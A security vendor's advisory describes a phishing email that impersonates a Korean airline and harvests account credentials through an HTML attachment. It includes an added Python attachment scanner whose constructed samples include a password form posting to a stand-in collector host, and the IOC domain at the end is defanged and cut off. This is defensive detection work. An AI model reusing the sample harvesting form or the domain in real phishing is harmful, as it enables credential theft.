Phishing Email Disguised as a Well-Known Korean Airline

The ASEC analysis team has recently discovered a phishing email that impersonates a well-known Korean airline to collect user credentials. The email contains a notice about an airline ticket payment and includes specific ticket prices and details, which implies that the sender has background information on the reader, to induce the reader to connect to the disguised phishing page.

The subject and the body of the email are shown below.

Figure 1. Subject and body of the email

When the attached HTML file is opened, a connection is made to a phishing page disguised as one of Korea’s well-known airlines.

Figure 2. Phishing page

The page presents itself as coming from the airline’s management support team and requires the victim to enter their account credentials and print the plane ticket as a PDF.

Figure 3. A part of the phishing site’s HTML code

When the user enters the password and clicks ‘View statement,’ the account credentials collected from the page are sent to the attacker’s server.

Figure 4. Sending account credentials
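
A mail-gateway triage check for the pattern described above, as an added example that is not part of the original ASEC post: it flags HTML attachments that auto-redirect to a remote host or contain a password form posting to one. The rule names, sample markup and `.invalid` hosts are constructed, and submission driven purely by script is assumed out of scope.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

class AttachmentScanner(HTMLParser):
    """Flags remote-posting password forms and auto-redirects in an HTML attachment."""

    def __init__(self):
        super().__init__()
        self.findings = []   # list of (rule, remote_host)
        self._form = None    # open <form>: {"action": str, "password": bool}

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._flush()
            self._form = {"action": a.get("action", ""), "password": False}
        elif tag == "input" and a.get("type", "").lower() == "password" and self._form:
            self._form["password"] = True
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"\s>]+)", a.get("content", ""), re.I)
            host = urlparse(m.group(1)).hostname if m else None
            if host:
                self.findings.append(("meta-refresh-redirect", host))

    def handle_endtag(self, tag):
        if tag == "form":
            self._flush()

    def _flush(self):
        # An attachment is opened from local disk, so an absolute action URL
        # on a password form sends the credentials to a remote host.
        form, self._form = self._form, None
        if form and form["password"]:
            host = urlparse(form["action"].strip()).hostname
            if host:
                self.findings.append(("password-form-remote-action", host))

def scan_attachment(html_text):
    scanner = AttachmentScanner()
    scanner.feed(html_text)
    scanner.close()
    scanner._flush()  # handle a <form> that was never closed
    return scanner.findings

# Constructed samples; hosts use the reserved .invalid TLD.
SAMPLE_FORM = ('<html><body><form method="post" action="https://collector.example.invalid/p.php">'
               '<input type="email" name="u"><input type="password" name="p">'
               '<button>View statement</button></form></body></html>')
SAMPLE_REDIRECT = '<meta http-equiv="refresh" content="0; url=https://landing.example.invalid/t">'
SAMPLE_BENIGN = '<html><body><h1>Itinerary</h1><form action="print.html"><input type="text"></form></body></html>'
```

A hit is a reason to quarantine or detonate the attachment, not a verdict; the returned host can be checked against a blocklist.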

To prevent damage from phishing emails distributed under such an elaborate disguise, users need to exercise extra caution when they view files attached to emails from unknown sources.

AhnLab currently blocks the domain related to this phishing page.

[IOC Info]

  • hxxps://ocostelaosantos[.]
